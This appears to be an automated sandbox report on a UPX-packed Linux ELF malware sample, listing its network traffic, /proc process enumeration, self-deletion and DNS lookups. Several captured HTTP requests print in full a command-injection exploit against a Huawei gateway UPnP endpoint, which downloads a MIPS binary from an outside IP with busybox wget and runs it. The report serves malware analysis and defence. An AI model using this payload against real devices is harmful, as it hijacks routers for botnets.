4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Sample listens on a socket

Source: /tmp/GZBCPDzO6n.elf (PID: 5430)

Socket: 127.0.0.1::8345

Jump to behavior

Source: unknown	TCP traffic detected without corresponding DNS query: 197.212.106.121
Source: unknown	TCP traffic detected without corresponding DNS query: 197.174.135.120
Source: unknown	TCP traffic detected without corresponding DNS query: 197.183.115.110
Source: unknown	TCP traffic detected without corresponding DNS query: 197.44.191.167
Source: unknown	TCP traffic detected without corresponding DNS query: 197.251.79.46
Source: unknown	TCP traffic detected without corresponding DNS query: 197.247.245.215
Source: unknown	TCP traffic detected without corresponding DNS query: 197.206.175.163
Source: unknown	TCP traffic detected without corresponding DNS query: 197.0.80.221
Source: unknown	TCP traffic detected without corresponding DNS query: 197.3.217.144
Source: unknown	TCP traffic detected without corresponding DNS query: 197.72.18.244
Source: unknown	TCP traffic detected without corresponding DNS query: 197.147.16.117
Source: unknown	TCP traffic detected without corresponding DNS query: 197.142.59.42
Source: unknown	TCP traffic detected without corresponding DNS query: 197.109.191.162
Source: unknown	TCP traffic detected without corresponding DNS query: 197.185.211.71
Source: unknown	TCP traffic detected without corresponding DNS query: 197.22.28.98
Source: unknown	TCP traffic detected without corresponding DNS query: 197.68.131.208
Source: unknown	TCP traffic detected without corresponding DNS query: 197.248.141.96
Source: unknown	TCP traffic detected without corresponding DNS query: 197.172.252.17
Source: unknown	TCP traffic detected without corresponding DNS query: 197.24.143.44
Source: unknown	TCP traffic detected without corresponding DNS query: 197.97.41.32
Source: unknown	TCP traffic detected without corresponding DNS query: 197.234.95.66
Source: unknown	TCP traffic detected without corresponding DNS query: 197.106.122.239
Source: unknown	TCP traffic detected without corresponding DNS query: 197.135.180.43
Source: unknown	TCP traffic detected without corresponding DNS query: 197.207.238.227
Source: unknown	TCP traffic detected without corresponding DNS query: 197.122.216.169
Source: unknown	TCP traffic detected without corresponding DNS query: 197.45.11.31
Source: unknown	TCP traffic detected without corresponding DNS query: 197.43.117.133
Source: unknown	TCP traffic detected without corresponding DNS query: 197.235.194.84
Source: unknown	TCP traffic detected without corresponding DNS query: 197.232.119.47
Source: unknown	TCP traffic detected without corresponding DNS query: 197.227.160.153
Source: unknown	TCP traffic detected without corresponding DNS query: 197.90.163.221
Source: unknown	TCP traffic detected without corresponding DNS query: 197.227.138.149
Source: unknown	TCP traffic detected without corresponding DNS query: 197.8.245.82
Source: unknown	TCP traffic detected without corresponding DNS query: 197.18.43.241
Source: unknown	TCP traffic detected without corresponding DNS query: 197.220.166.138
Source: unknown	TCP traffic detected without corresponding DNS query: 197.44.203.221
Source: unknown	TCP traffic detected without corresponding DNS query: 197.242.91.79
Source: unknown	TCP traffic detected without corresponding DNS query: 197.84.161.130
Source: unknown	TCP traffic detected without corresponding DNS query: 197.73.91.220
Source: unknown	TCP traffic detected without corresponding DNS query: 197.80.125.123
Source: unknown	TCP traffic detected without corresponding DNS query: 197.189.57.158
Source: unknown	TCP traffic detected without corresponding DNS query: 197.76.235.108
Source: unknown	TCP traffic detected without corresponding DNS query: 197.97.215.33
Source: unknown	TCP traffic detected without corresponding DNS query: 197.43.88.206
Source: unknown	TCP traffic detected without corresponding DNS query: 197.105.109.85
Source: unknown	TCP traffic detected without corresponding DNS query: 197.30.101.175
Source: unknown	TCP traffic detected without corresponding DNS query: 197.29.159.199
Source: unknown	TCP traffic detected without corresponding DNS query: 197.44.107.84
Source: unknown	TCP traffic detected without corresponding DNS query: 197.55.14.170
Source: unknown	TCP traffic detected without corresponding DNS query: 197.31.158.60

Source: unknown

DNS traffic detected: queries for: sex.secure-cyber-security-rebirthltd.su

Source: unknown

HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 37 39 2e 31 31 30 2e 36 32 2e 38 36 2f 73 72 65 70 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 73 72 65 70 2e 6d 69 70 73 3b 20 2e 2f 73 72 65 70 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://79.110.62.86/srep.mips; /bin/busybox chmod 777 * srep.mips; ./srep.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Source: GZBCPDzO6n.elf, 5430.1.00007f71e0017000.00007f71e0033000.r-x.sdmp	String found in binary or memory: http://79.110.62.86/srep.mips;
Source: GZBCPDzO6n.elf, 5430.1.00007f71e0017000.00007f71e0033000.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: GZBCPDzO6n.elf, 5430.1.00007f71e0017000.00007f71e0033000.r-x.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: GZBCPDzO6n.elf	String found in binary or memory: http://upx.sf.net

Sample contains only a LOAD segment without any section mappings

Source: LOAD without section mappings

Program segment: 0x8000

Source: classification engine

Classification label: mal88.troj.evad.linELF@0/0@25/0

Data Obfuscation

Sample is packed with UPX

Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved. $

Enumerates processes within the "proc" file system

Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/88/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/88/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/88/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/88/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/88/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/88/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111117/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111113/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/4444/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/999/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/8888/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/11/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/11/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/11/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/11/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/11/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/11/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/99/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/99/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/99/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/99/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/99/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/99/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/888/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/11111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/22/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/22/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/22/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/22/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/22/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/22/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/777/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/1111/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/5555/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/9999/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/33/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/22222/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/44/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/33333/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/2222/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/6666/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/55/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/66/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/333334/cmdline	Jump to behavior
Source: /tmp/GZBCPDzO6n.elf (PID: 5439)	File opened: /proc/333/cmdline	Jump to behavior

Hooking and other Techniques for Hiding and Protection

Sample deletes itself

Source: /tmp/GZBCPDzO6n.elf (PID: 5430)

File: /tmp/GZBCPDzO6n.elf

Jump to behavior

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 35744 -> 37215
